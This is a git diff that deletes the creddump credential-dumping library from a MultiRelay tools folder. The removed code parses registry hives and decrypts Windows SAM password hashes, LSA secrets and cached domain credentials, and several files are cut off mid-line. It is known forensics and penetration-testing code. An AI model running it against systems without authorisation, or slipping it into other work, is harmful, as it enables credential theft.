- print("\nExample (Windows XP):")
- print("%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[0])
-
-
-if len(sys.argv) < 4:
- showUsage()
- sys.exit(1)
-
-if sys.argv[3].lower() not in ["true", "false"]:
- showUsage()
- sys.exit(1)
-
-vista = sys.argv[3].lower() == "true"
-
-dump_file_hashes(sys.argv[1], sys.argv[2], sys.argv[3])
diff --git a/tools/MultiRelay/creddump/framework/__init__.py b/tools/MultiRelay/creddump/framework/__init__.py
deleted file mode 100644
index e69de29..0000000
diff --git a/tools/MultiRelay/creddump/framework/addrspace.py b/tools/MultiRelay/creddump/framework/addrspace.py
deleted file mode 100755
index fe42d57..0000000
--- a/tools/MultiRelay/creddump/framework/addrspace.py
+++ /dev/null
@@ -1,147 +0,0 @@
-# Volatility
-# Copyright (C) 2007 Volatile Systems
-#
-# Original Source:
-# Copyright (C) 2004,2005,2006 4tphi Research
-# Author: {npetroni,awalters}@4tphi.net (Nick Petroni and AAron Walters)
-#
-# This program is free software; you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation; either version 2 of the License, or (at
-# your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-# General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, write to the Free Software
-# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
-#
-
-"""
-@author: AAron Walters
-@license: GNU General Public License 2.0 or later
-@contact: awalters@volatilesystems.com
-@organization: Volatile Systems
-
-Alias for all address spaces
-"""
-
-# pylint: disable=missing-docstring
-
-import os
-import struct
-
-
-class FileAddressSpace:
- def __init__(self, fname, mode='rb', fast=False):
- self.fname = fname
- self.name = fname
- self.fhandle = open(fname, mode)
- self.fsize = os.path.getsize(fname)
-
- if fast:
- self.fast_fhandle = open(fname, mode)
-
- def fread(self, len):
- return self.fast_fhandle.read(len)
-
- def read(self, addr, len):
- self.fhandle.seek(addr)
- return self.fhandle.read(len)
-
- def read_long(self, addr):
- string = self.read(addr, 4)
- (longval,) = struct.unpack('L', string)
- return longval
-
- def get_address_range(self):
- return [0, self.fsize - 1]
-
- def get_available_addresses(self):
- return [self.get_address_range()]
-
- def is_valid_address(self, addr):
- return addr < self.fsize - 1
-
- def close(self):
- self.fhandle.close()
-
-
-# Code below written by Brendan Dolan-Gavitt
-
-BLOCK_SIZE = 0x1000
-
-
-class HiveFileAddressSpace:
- def __init__(self, fname):
- self.fname = fname
- self.base = FileAddressSpace(fname)
-
- def vtop(self, vaddr):
- return vaddr + BLOCK_SIZE + 4
-
- def read(self, vaddr, length, zero=False):
- first_block = BLOCK_SIZE - vaddr % BLOCK_SIZE
- full_blocks = ((length + (vaddr % BLOCK_SIZE)) // BLOCK_SIZE) - 1
- left_over = (length + vaddr) % BLOCK_SIZE
-
- paddr = self.vtop(vaddr)
- if paddr is None and zero:
- if length < first_block:
- return "\0" * length
- else:
- stuff_read = "\0" * first_block
- elif paddr is None:
- return None
- else:
- if length < first_block:
- stuff_read = self.base.read(paddr, length)
- if not stuff_read and zero:
- return "\0" * length
- else:
- return stuff_read
-
- stuff_read = self.base.read(paddr, first_block)
- if not stuff_read and zero:
- stuff_read = "\0" * first_block
-
- new_vaddr = vaddr + first_block
- for __ in range(0, full_blocks):
- paddr = self.vtop(new_vaddr)
- if paddr is None and zero:
- stuff_read = stuff_read + "\0" * BLOCK_SIZE
- elif paddr is None:
- return None
- else:
- new_stuff = self.base.read(paddr, BLOCK_SIZE)
- if not new_stuff and zero:
- new_stuff = "\0" * BLOCK_SIZE
- elif not new_stuff:
- return None
- else:
- stuff_read = stuff_read + new_stuff
- new_vaddr = new_vaddr + BLOCK_SIZE
-
- if left_over > 0:
- paddr = self.vtop(new_vaddr)
- if paddr is None and zero:
- stuff_read = stuff_read + "\0" * left_over
- elif paddr is None:
- return None
- else:
- stuff_read = stuff_read + self.base.read(paddr, left_over)
- return stuff_read
-
- def read_long_phys(self, addr):
- string = self.base.read(addr, 4)
- (longval,) = struct.unpack('L', string)
- return longval
-
- def is_valid_address(self, vaddr):
- paddr = self.vtop(vaddr)
- if not paddr:
- return False
- return self.base.is_valid_address(paddr)
diff --git a/tools/MultiRelay/creddump/framework/newobj.py b/tools/MultiRelay/creddump/framework/newobj.py
deleted file mode 100644
index 1a28972..0000000
--- a/tools/MultiRelay/creddump/framework/newobj.py
+++ /dev/null
@@ -1,320 +0,0 @@
-# This file is part of creddump.
-#
-# creddump is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# creddump is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with creddump. If not, see .
-
-"""
-@author: Brendan Dolan-Gavitt
-@license: GNU General Public License 2.0 or later
-@contact: bdolangavitt@wesleyan.edu
-"""
-
-# pylint: disable=missing-docstring,invalid-name,no-else-return,arguments-differ,unused-argument
-
-from operator import itemgetter
-from struct import unpack
-
-from framework.object import get_obj_offset, builtin_types, read_value, read_unicode_string, read_string, read_obj
-from framework.types import regtypes as types
-
-
-def get_ptr_type(structure, member):
- """Return the type a pointer points to.
-
- Arguments:
- structure : the name of the structure from vtypes
- member : a list of members
-
- Example:
- get_ptr_type('_EPROCESS', ['ActiveProcessLinks', 'Flink']) => ['_LIST_ENTRY']
- """
- if len(member) > 1:
- _, tp = get_obj_offset(types, [structure, member[0]])
- if tp == 'array':
- return types[structure][1][member[0]][1][2][1]
- else:
- return get_ptr_type(tp, member[1:])
- else:
- return types[structure][1][member[0]][1][1]
-
-
-class Obj(object):
- """Base class for all objects.
-
- May return a subclass for certain data types to allow
- for special handling.
- """
-
- def __new__(cls, name, address, space):
- if name in globals():
- # This is a bit of "magic"
- # Could be replaced with a dict mapping type names to types
- return globals()[name](name, address, space)
- elif name in builtin_types:
- return Primitive(name, address, space)
- else:
- obj = object.__new__(cls)
- return obj
-
- def __init__(self, name, address, space):
- self.name = name
- self.address = address
- self.space = space
-
- # Subclasses can add fields to this list if they want them
- # to show up in values() or members(), even if they do not
- # appear in the vtype definition
- self.extra_members = []
-
- def __getattribute__(self, attr):
- try:
- return object.__getattribute__(self, attr)
- except AttributeError:
- pass
-
- if self.name in builtin_types:
- raise AttributeError("Primitive types have no dynamic attributes")
-
- try:
- off, tp = get_obj_offset(types, [self.name, attr])
- except:
- raise AttributeError("'%s' has no attribute '%s'" % (self.name, attr))
-
- if tp == 'array':
- a_len = types[self.name][1][attr][1][1]
- l = []
- for i in range(a_len):
- a_off, a_tp = get_obj_offset(types, [self.name, attr, i])
- if a_tp == 'pointer':
- ptp = get_ptr_type(self.name, [attr, i])
- l.append(Pointer(a_tp, self.address + a_off, self.space, ptp))
- else:
- l.append(Obj(a_tp, self.address + a_off, self.space))
- return l
- elif tp == 'pointer':
- # Can't just return a Obj here, since pointers need to also
- # know what type they point to.
- ptp = get_ptr_type(self.name, [attr])
- return Pointer(tp, self.address + off, self.space, ptp)
- else:
- return Obj(tp, self.address + off, self.space)
-
- def __truediv__(self, other):
- if isinstance(other, (tuple, list)):
- return Pointer(other[0], self.address, self.space, other[1])
- elif isinstance(other, str):
- return Obj(other, self.address, self.space)
- else:
- raise ValueError("Must provide a type name as string for casting")
-
- def members(self):
- """Return a list of this object's members, sorted by offset."""
-
- # Could also just return the list
- membs = [(k, v[0]) for k, v in list(types[self.name][1].items())]
- membs.sort(key=itemgetter(1))
- return list(map(itemgetter(0), membs)) + self.extra_members
-
- def values(self):
- """Return a dictionary of this object's members and their values"""
-
- valdict = {}
- for k in self.members():
- valdict[k] = getattr(self, k)
- return valdict
-
- def bytes(self, length=-1):
- """Get bytes starting at the address of this object.
-
- Arguments:
- length : the number of bytes to read. Default: size of
- this object.
- """
-
- if length == -1:
- length = self.size()
- return self.space.read(self.address, length)
-
- def size(self):
- """Get the size of this object."""
-
- if self.name in builtin_types:
- return builtin_types[self.name][0]
- else:
- return types[self.name][0]
-
- def __repr__(self):
- return "<%s @%08x>" % (self.name, self.address)
-
- def __eq__(self, other):
- if not isinstance(other, Obj):
- raise TypeError("Types are incomparable")
- return self.address == other.address and self.name == other.name
-
- def __ne__(self, other):
- return not self.__eq__(other)
-
- def __hash__(self):
- return hash(self.address) ^ hash(self.name)
-
- def is_valid(self):
- return self.space.is_valid_address(self.address)
-
- def get_offset(self, member):
- return get_obj_offset(types, [self.name] + member)
-
-
-class Primitive(Obj):
- """Class to represent a primitive data type.
-
- Attributes:
- value : the python primitive value of this type
- """
-
- def __new__(cls, *args, **kwargs):
- obj = object.__new__(cls)
- return obj
-
- def __init__(self, name, address, space):
- super(Primitive, self).__init__(name, address, space)
- length, fmt = builtin_types[name]
- data = space.read(address, length)
- if not data:
- self.value = None
- else:
- self.value = unpack(fmt, data)[0]
-
- def __repr__(self):
- return repr(self.value)
-
- def members(self):
- return []
-
-
-class Pointer(Obj):
- """Class to represent pointers.
-
- value : the object pointed to
-
- If an attribute is not found in this instance,
- the attribute will be looked up in the referenced
- object."""
-
- def __new__(cls, *args, **kwargs):
- obj = object.__new__(cls)
- return obj
-
- def __init__(self, name, address, space, ptr_type):
- super(Pointer, self).__init__(name, address, space)
- ptr_address = read_value(space, name, address)
- if ptr_type[0] == 'pointer':
- self.value = Pointer(ptr_type[0], ptr_address, self.space, ptr_type[1])
- else:
- self.value = Obj(ptr_type[0], ptr_address, self.space)
-
- def __getattribute__(self, attr):
- # It's still nice to be able to access things through pointers
- # without having to explicitly dereference them, so if we don't
- # find an attribute via our superclass, just dereference the pointer
- # and return the attribute in the pointed-to type.
- try:
- return super(Pointer, self).__getattribute__(attr)
- except AttributeError:
- return getattr(self.value, attr)
-
- def __repr__(self):
- return "" % (self.value.name, self.value.address)
-
- def members(self):
- return self.value.members()
-
-
-class _UNICODE_STRING(Obj):
- """Class representing a _UNICODE_STRING
-
- Adds the following behavior:
- * The Buffer attribute is presented as a Python string rather
- than a pointer to an unsigned short.
- * The __str__ method returns the value of the Buffer.
- """
-
- def __new__(cls, *args, **kwargs):
- obj = object.__new__(cls)
- return obj
-
- def __str__(self):
- return self.Buffer
-
- # Custom Attributes
- def getBuffer(self):
- return read_unicode_string(self.space, types, [], self.address)
-
- Buffer = property(fget=getBuffer)
-
-
-class _CM_KEY_NODE(Obj):
- def __new__(cls, *args, **kwargs):
- obj = object.__new__(cls)
- return obj
-
- def getName(self):
- return read_string(self.space, types, ['_CM_KEY_NODE', 'Name'],
- self.address, self.NameLength.value)
-
- Name = property(fget=getName)
-
-
-class _CM_KEY_VALUE(Obj):
- def __new__(cls, *args, **kwargs):
- obj = object.__new__(cls)
- return obj
-
- def getName(self):
- return read_string(self.space, types, ['_CM_KEY_VALUE', 'Name'],
- self.address, self.NameLength.value)
-
- Name = property(fget=getName)
-
-
-class _CHILD_LIST(Obj):
- def __new__(cls, *args, **kwargs):
- obj = object.__new__(cls)
- return obj
-
- def getList(self):
- lst = []
- list_address = read_obj(self.space, types,
- ['_CHILD_LIST', 'List'], self.address)
- for i in range(self.Count.value):
- lst.append(Pointer("pointer", list_address + (i * 4), self.space,
- ["_CM_KEY_VALUE"]))
- return lst
-
- List = property(fget=getList)
-
-
-class _CM_KEY_INDEX(Obj):
- def __new__(cls, *args, **kwargs):
- obj = object.__new__(cls)
- return obj
-
- def getList(self):
- lst = []
- for i in range(self.Count.value):
- # we are ignoring the hash value here
- off, __ = get_obj_offset(types, ['_CM_KEY_INDEX', 'List', i * 2])
- lst.append(Pointer("pointer", self.address + off, self.space,
- ["_CM_KEY_NODE"]))
- return lst
-
- List = property(fget=getList)
diff --git a/tools/MultiRelay/creddump/framework/object.py b/tools/MultiRelay/creddump/framework/object.py
deleted file mode 100644
index d11243d..0000000
--- a/tools/MultiRelay/creddump/framework/object.py
+++ /dev/null
@@ -1,171 +0,0 @@
-# Volatools Basic
-# Copyright (C) 2007 Komoku, Inc.
-#
-# This program is free software; you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation; either version 2 of the License, or (at
-# your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-# General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, write to the Free Software
-# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
-#
-
-# pylint: disable=invalid-name,missing-docstring
-
-"""
-@author: AAron Walters and Nick Petroni
-@license: GNU General Public License 2.0 or later
-@contact: awalters@komoku.com, npetroni@komoku.com
-@organization: Komoku, Inc.
-"""
-
-import struct
-
-builtin_types = {
- 'int': (4, 'i'),
- 'long': (4, 'i'),
- 'unsigned long': (4, 'I'),
- 'unsigned int': (4, 'I'),
- 'address': (4, 'I'),
- 'char': (1, 'c'),
- 'unsigned char': (1, 'B'),
- 'unsigned short': (2, 'H'),
- 'short': (2, 'h'),
- 'long long': (8, 'q'),
- 'unsigned long long': (8, 'Q'),
- 'pointer': (4, 'I'),
-}
-
-
-def obj_size(types, objname):
- if objname not in types:
- raise Exception('Invalid type %s not in types' % (objname))
-
- return types[objname][0]
-
-
-def builtin_size(builtin):
- if builtin not in builtin_types:
- raise Exception('Invalid built-in type %s' % (builtin))
-
- return builtin_types[builtin][0]
-
-
-def read_value(addr_space, value_type, vaddr):
- """
- Read the low-level value for a built-in type.
- """
-
- if value_type not in builtin_types:
- raise Exception('Invalid built-in type %s' % (value_type))
-
- type_unpack_char = builtin_types[value_type][1]
- type_size = builtin_types[value_type][0]
-
- buf = addr_space.read(vaddr, type_size)
- if buf is None:
- return None
- (val,) = struct.unpack(type_unpack_char, buf)
-
- return val
-
-
-def read_unicode_string(addr_space, types, member_list, vaddr):
- offset = 0
- if len(member_list) > 1:
- (offset, __) = get_obj_offset(types, member_list)
-
- buf = read_obj(addr_space, types, ['_UNICODE_STRING', 'Buffer'], vaddr + offset)
- length = read_obj(addr_space, types, ['_UNICODE_STRING', 'Length'], vaddr + offset)
-
- if length == 0x0:
- return ""
-
- if buf is None or length is None:
- return None
-
- readBuf = read_string(addr_space, types, ['char'], buf, length)
-
- if readBuf is None:
- return None
-
- try:
- readBuf = readBuf.decode('UTF-16').encode('ascii')
- except Exception: # pylint: disable=broad-except
- return None
-
- return readBuf
-
-
-def read_string(addr_space, types, member_list, vaddr, max_length=256):
- offset = 0
- if len(member_list) > 1:
- (offset, __) = get_obj_offset(types, member_list)
-
- val = addr_space.read(vaddr + offset, max_length)
-
- return val
-
-
-def read_null_string(addr_space, types, member_list, vaddr, max_length=256):
- string = read_string(addr_space, types, member_list, vaddr, max_length)
-
- if string is None:
- return None
-
- return string.split('\0', 1)[0]
-
-
-def get_obj_offset(types, member_list):
- """
- Returns the (offset, type) pair for a given list
- """
- member_list.reverse()
-
- current_type = member_list.pop()
-
- offset = 0
-
- while member_list:
- if current_type == 'array':
- current_type = member_dict[current_member][1][2][0]
- if current_type in builtin_types:
- current_type_size = builtin_size(current_type)
- else:
- current_type_size = obj_size(types, current_type)
- index = member_list.pop()
- offset += index * current_type_size
- continue
-
- elif current_type not in types:
- raise Exception('Invalid type ' + current_type)
-
- member_dict = types[current_type][1]
-
- current_member = member_list.pop()
- if current_member not in member_dict:
- raise Exception('Invalid member %s in type %s' % (current_member, current_type))
-
- offset += member_dict[current_member][0]
-
- current_type = member_dict[current_member][1][0]
-
- return (offset, current_type)
-
-
-def read_obj(addr_space, types, member_list, vaddr):
- """
- Read the low-level value for some complex type's member.
- The type must have members.
- """
- if len(member_list) < 2:
- raise Exception('Invalid type/member ' + str(member_list))
-
- (offset, current_type) = get_obj_offset(types, member_list)
- return read_value(addr_space, current_type, vaddr + offset)
diff --git a/tools/MultiRelay/creddump/framework/types.py b/tools/MultiRelay/creddump/framework/types.py
deleted file mode 100644
index cbf8b4f..0000000
--- a/tools/MultiRelay/creddump/framework/types.py
+++ /dev/null
@@ -1,65 +0,0 @@
-# This file is part of creddump.
-#
-# creddump is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# creddump is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with creddump. If not, see .
-
-# pylint: disable=invalid-name
-
-"""
-@author: Brendan Dolan-Gavitt
-@license: GNU General Public License 2.0 or later
-@contact: bdolangavitt@wesleyan.edu
-"""
-
-regtypes = {
- '_CM_KEY_VALUE': [0x18, {
- 'Signature': [0x0, ['unsigned short']],
- 'NameLength': [0x2, ['unsigned short']],
- 'DataLength': [0x4, ['unsigned long']],
- 'Data': [0x8, ['unsigned long']],
- 'Type': [0xc, ['unsigned long']],
- 'Flags': [0x10, ['unsigned short']],
- 'Spare': [0x12, ['unsigned short']],
- 'Name': [0x14, ['array', 1, ['unsigned short']]],
- }],
- '_CM_KEY_NODE': [0x50, {
- 'Signature': [0x0, ['unsigned short']],
- 'Flags': [0x2, ['unsigned short']],
- 'LastWriteTime': [0x4, ['_LARGE_INTEGER']],
- 'Spare': [0xc, ['unsigned long']],
- 'Parent': [0x10, ['unsigned long']],
- 'SubKeyCounts': [0x14, ['array', 2, ['unsigned long']]],
- 'SubKeyLists': [0x1c, ['array', 2, ['unsigned long']]],
- 'ValueList': [0x24, ['_CHILD_LIST']],
- 'ChildHiveReference': [0x1c, ['_CM_KEY_REFERENCE']],
- 'Security': [0x2c, ['unsigned long']],
- 'Class': [0x30, ['unsigned long']],
- 'MaxNameLen': [0x34, ['unsigned long']],
- 'MaxClassLen': [0x38, ['unsigned long']],
- 'MaxValueNameLen': [0x3c, ['unsigned long']],
- 'MaxValueDataLen': [0x40, ['unsigned long']],
- 'WorkVar': [0x44, ['unsigned long']],
- 'NameLength': [0x48, ['unsigned short']],
- 'ClassLength': [0x4a, ['unsigned short']],
- 'Name': [0x4c, ['array', 1, ['unsigned short']]],
- }],
- '_CM_KEY_INDEX': [0x8, {
- 'Signature': [0x0, ['unsigned short']],
- 'Count': [0x2, ['unsigned short']],
- 'List': [0x4, ['array', 1, ['unsigned long']]],
- }],
- '_CHILD_LIST': [0x8, {
- 'Count': [0x0, ['unsigned long']],
- 'List': [0x4, ['unsigned long']],
- }],
-}
diff --git a/tools/MultiRelay/creddump/framework/win32/__init__.py b/tools/MultiRelay/creddump/framework/win32/__init__.py
deleted file mode 100644
index e69de29..0000000
diff --git a/tools/MultiRelay/creddump/framework/win32/domcachedump.py b/tools/MultiRelay/creddump/framework/win32/domcachedump.py
deleted file mode 100644
index 542ce41..0000000
--- a/tools/MultiRelay/creddump/framework/win32/domcachedump.py
+++ /dev/null
@@ -1,135 +0,0 @@
-# This file is part of creddump.
-#
-# creddump is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# creddump is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with creddump. If not, see .
-
-"""
-@author: Brendan Dolan-Gavitt
-@license: GNU General Public License 2.0 or later
-@contact: bdolangavitt@wesleyan.edu
-"""
-
-from framework.win32.rawreg import *
-from framework.addrspace import HiveFileAddressSpace
-from framework.win32.hashdump import get_bootkey
-from framework.win32.lsasecrets import get_secret_by_name,get_lsa_key
-from Crypto.Hash import HMAC
-from Crypto.Cipher import ARC4, AES
-from struct import unpack
-
-def get_nlkm(secaddr, lsakey, vista):
- return get_secret_by_name(secaddr, 'NL$KM', lsakey, vista)
-
-def decrypt_hash(edata, nlkm, ch):
- hmac_md5 = HMAC.new(nlkm,ch)
- rc4key = hmac_md5.digest()
-
- rc4 = ARC4.new(rc4key)
- data = rc4.encrypt(edata)
- return data
-
-def decrypt_hash_vista(edata, nlkm, ch):
- """
- Based on code from http://lab.mediaservice.net/code/cachedump.rb
- """
- aes = AES.new(nlkm[16:32], AES.MODE_CBC, ch)
-
- out = bytearray()
- for i in range(0, len(edata), 16):
- buf = edata[i : i+16]
- if len(buf) < 16:
- buf += (16 - len(buf)) * b"\00"
-
- out += aes.decrypt(buf)
- return out
-
-def parse_cache_entry(cache_data):
- (uname_len, domain_len) = unpack(".
-
-# pylint: disable=invalid-name,missing-docstring
-
-"""
-@author: Brendan Dolan-Gavitt
-@license: GNU General Public License 2.0 or later
-@contact: bdolangavitt@wesleyan.edu
-"""
-
-from struct import unpack, pack
-import binascii
-
-from Crypto.Hash import MD5
-from Crypto.Cipher import ARC4, DES, AES
-
-from framework.win32.rawreg import get_root, open_key, values, subkeys
-from framework.addrspace import HiveFileAddressSpace
-
-odd_parity = [
- 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
- 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
- 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
- 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
- 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
- 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
- 97, 97, 98, 98, 100, 100, 103, 103, 104, 104, 107, 107, 109, 109, 110, 110,
- 112, 112, 115, 115, 117, 117, 118, 118, 121, 121, 122, 122, 124, 124, 127, 127,
- 128, 128, 131, 131, 133, 133, 134, 134, 137, 137, 138, 138, 140, 140, 143, 143,
- 145, 145, 146, 146, 148, 148, 151, 151, 152, 152, 155, 155, 157, 157, 158, 158,
- 161, 161, 162, 162, 164, 164, 167, 167, 168, 168, 171, 171, 173, 173, 174, 174,
- 176, 176, 179, 179, 181, 181, 182, 182, 185, 185, 186, 186, 188, 188, 191, 191,
- 193, 193, 194, 194, 196, 196, 199, 199, 200, 200, 203, 203, 205, 205, 206, 206,
- 208, 208, 211, 211, 213, 213, 214, 214, 217, 217, 218, 218, 220, 220, 223, 223,
- 224, 224, 227, 227, 229, 229, 230, 230, 233, 233, 234, 234, 236, 236, 239, 239,
- 241, 241, 242, 242, 244, 244, 247, 247, 248, 248, 251, 251, 253, 253, 254, 254
-]
-
-# Permutation matrix for boot key
-p = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3,
- 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7]
-
-# Constants for SAM decrypt algorithm
-aqwerty = b"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
-anum = b"0123456789012345678901234567890123456789\0"
-antpassword = b"NTPASSWORD\0"
-almpassword = b"LMPASSWORD\0"
-
-empty_lm = binascii.unhexlify("aad3b435b51404eeaad3b435b51404ee")
-empty_nt = binascii.unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0")
-
-
-def str_to_key(s):
- key = bytearray()
- key.append(s[0] >> 1)
- key.append(((s[0] & 0x01) << 6) | ((s[1]) >> 2))
- key.append(((s[1] & 0x03) << 5) | ((s[2]) >> 3))
- key.append(((s[2] & 0x07) << 4) | ((s[3]) >> 4))
- key.append(((s[3] & 0x0F) << 3) | ((s[4]) >> 5))
- key.append(((s[4] & 0x1F) << 2) | ((s[5]) >> 6))
- key.append(((s[5] & 0x3F) << 1) | ((s[6]) >> 7))
- key.append(s[6] & 0x7F)
- for i in range(8):
- key[i] = (key[i] << 1)
- key[i] = odd_parity[key[i]]
- return key
-
-
-def sid_to_key(sid):
- s1 = bytearray()
- s1.append(sid & 0xFF)
- s1.append((sid >> 8) & 0xFF)
- s1.append((sid >> 16) & 0xFF)
- s1.append((sid >> 24) & 0xFF)
- s1.append(s1[0])
- s1.append(s1[1])
- s1.append(s1[2])
- s2 = bytearray([s1[3], s1[0], s1[1], s1[2]])
- s2.append(s2[0])
- s2.append(s2[1])
- s2.append(s2[2])
-
- return str_to_key(s1), str_to_key(s2)
-
-
-def find_control_set(sysaddr):
- root = get_root(sysaddr)
- if not root:
- return 1
-
- csselect = open_key(root, ["Select"])
- if not csselect:
- return 1
-
- for v in values(csselect):
- if v.Name == b"Current":
- return v.Data.value
-
- return 1
-
-
-def get_bootkey(sysaddr):
- cs = find_control_set(sysaddr)
- lsa_base = ["ControlSet%03d" % cs, "Control", "Lsa"]
- lsa_keys = ["JD", "Skew1", "GBG", "Data"]
-
- root = get_root(sysaddr)
- if not root:
- return None
-
- lsa = open_key(root, lsa_base)
- if not lsa:
- return None
-
- bootkey = []
-
- for lk in lsa_keys:
- key = open_key(lsa, [lk])
- class_data = sysaddr.read(key.Class.value, key.ClassLength.value)
- hex_string = class_data.decode('utf-16-le')
- hex_data = binascii.unhexlify(hex_string)
- for h in hex_data:
- bootkey.append(h)
-
- bootkey_scrambled = []
- for i in range(len(bootkey)):
- bootkey_scrambled.append(bootkey[p[i]])
-
- return bytes(bootkey_scrambled)
-
-
-def get_hbootkey(samaddr, bootkey):
- sam_account_path = ["SAM", "Domains", "Account"]
-
- root = get_root(samaddr)
- if not root:
- return None
-
- sam_account_key = open_key(root, sam_account_path)
- if not sam_account_key:
- return None
-
- F = None
- for v in values(sam_account_key):
- if v.Name == b'F':
- F = samaddr.read(v.Data.value, v.DataLength.value)
- if not F:
- return None
-
- revision = F[0x00]
- if revision == 2:
- md5 = MD5.new()
- md5.update(F[0x70:0x80] + aqwerty + bootkey + anum)
- rc4_key = md5.digest()
-
- rc4 = ARC4.new(rc4_key)
- hbootkey = rc4.encrypt(F[0x80:0xA0])
-
- return hbootkey
-
- if revision == 3:
- iv = F[0x78:0x88]
- encryptedHBootKey = F[0x88:0xA8]
- cipher = AES.new(bootkey, AES.MODE_CBC, iv)
- hbootkey = cipher.decrypt(encryptedHBootKey)
-
- return hbootkey[:16]
-
- print("Unknown revision: %d" % revision)
- return None
-
-def get_user_keys(samaddr):
- user_key_path = ["SAM", "Domains", "Account", "Users"]
-
- root = get_root(samaddr)
- if not root:
- return []
-
- user_key = open_key(root, user_key_path)
- if not user_key:
- return []
-
- return [k for k in subkeys(user_key) if k.Name != b"Names"]
-
-
-def decrypt_single_hash(rid, hbootkey, enc_hash, lmntstr):
- if enc_hash == "":
- return ""
- (des_k1, des_k2) = sid_to_key(rid)
- d1 = DES.new(des_k1, DES.MODE_ECB)
- d2 = DES.new(des_k2, DES.MODE_ECB)
- md5 = MD5.new()
- md5.update(hbootkey[:0x10] + pack(".
-
-# pylint: disable=missing-docstring
-
-"""
-@author: Brendan Dolan-Gavitt
-@license: GNU General Public License 2.0 or later
-@contact: bdolangavitt@wesleyan.edu
-"""
-
-from Crypto.Hash import MD5, SHA256
-from Crypto.Cipher import ARC4, DES, AES
-
-from framework.win32.rawreg import get_root, open_key, subkeys, unpack
-from framework.addrspace import HiveFileAddressSpace
-from framework.win32.hashdump import get_bootkey, str_to_key
-
-
-def get_lsa_key(secaddr, bootkey, vista):
- root = get_root(secaddr)
- if not root:
- return None
-
- if vista:
- enc_reg_key = open_key(root, ["Policy", "PolEKList"])
- else:
- enc_reg_key = open_key(root, ["Policy", "PolSecretEncryptionKey"])
-
- if not enc_reg_key:
- return None
-
- enc_reg_value = enc_reg_key.ValueList.List[0]
- if not enc_reg_value:
- return None
-
- obf_lsa_key = secaddr.read(enc_reg_value.Data.value,
- enc_reg_value.DataLength.value)
- if not obf_lsa_key:
- return None
-
- if not vista:
- md5 = MD5.new()
- md5.update(bootkey)
- for __ in range(1000):
- md5.update(obf_lsa_key[60:76])
- rc4key = md5.digest()
- rc4 = ARC4.new(rc4key)
- lsa_key = rc4.decrypt(obf_lsa_key[12:60])
- lsa_key = lsa_key[0x10:0x20]
- else:
- lsa_key = decrypt_aes(obf_lsa_key, bootkey)
- lsa_key = lsa_key[68:100]
-
- return lsa_key
-
-
-def decrypt_secret(secret, key):
- """Python implementation of SystemFunction005.
-
- Decrypts a block of data with DES using given key.
- Note that key can be longer than 7 bytes."""
- decrypted_data = bytearray()
- j = 0 # key index
- for i in range(0, len(secret), 8):
- enc_block = secret[i:i + 8]
- block_key = key[j:j + 7]
- des_key = str_to_key(block_key)
-
- des = DES.new(des_key, DES.MODE_ECB)
- decrypted_data += des.decrypt(enc_block)
-
- j += 7
- if len(key[j:j + 7]) < 7:
- j = len(key[j:j + 7])
-
- (dec_data_len,) = unpack(".
-
-"""
-@author: Brendan Dolan-Gavitt
-@license: GNU General Public License 2.0 or later
-@contact: bdolangavitt@wesleyan.edu
-"""
-
-from framework.newobj import Obj,Pointer
-from struct import unpack
-
-ROOT_INDEX = 0x20
-LH_SIG = unpack(".
-
-# pylint: disable=invalid-name,missing-docstring
-
-"""
-@author: Brendan Dolan-Gavitt
-@license: GNU General Public License 2.0 or later
-@contact: bdolangavitt@wesleyan.edu
-"""
-
-import sys
-from framework.win32.lsasecrets import get_file_secrets
-
-# Hex dump code from
-# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812
-
-FILTER = ''.join(32 <= i < 127 and chr(i) or '.' for i in range(256))
-
-
-def showUsage():
